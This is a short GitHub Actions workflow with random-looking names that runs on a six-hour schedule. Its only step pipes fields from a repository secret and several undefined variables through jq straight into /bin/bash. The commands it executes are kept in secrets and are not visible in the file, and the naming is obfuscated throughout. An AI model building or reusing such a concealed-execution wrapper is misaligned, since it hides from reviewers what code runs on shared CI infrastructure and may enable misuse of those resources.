name: huangjiao2314
on:
  workflow_dispatch:
  schedule:
    - cron: '14 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: huangjiao2314
        env:
          igjk1: ${{ secrets.igjk1 }}
        run: |
          echo $igjk1 | jq -r .g1877 | /bin/bash
          echo $y22 | jq -r .bjbzl30 | /bin/bash
          echo $xqiw5 | jq -r .wus77990 | /bin/bash
          echo $iyf6801 | jq -r .ndxw4222 | /bin/bash
          echo $m8707 | jq -r .al26897 | /bin/bash
          echo $mtr0 | jq -r .upbkx50 | /bin/bash
          echo $f552 | jq -r .g7 | /bin/bash
          echo $tmp2 | jq -r .v055 | /bin/bash
          echo $qwtcj8 | jq -r .guoia9 | /bin/bash
          echo $mqrjo1332 | jq -r .vng3848 | /bin/bash
          echo $t0536 | jq -r .zx1 | /bin/bash
          echo $kdru356 | jq -r .t8732 | /bin/bash
          echo $g44 | jq -r .ox30 | /bin/bash
          echo $r39549 | jq -r .mhsmi7818 | /bin/bash

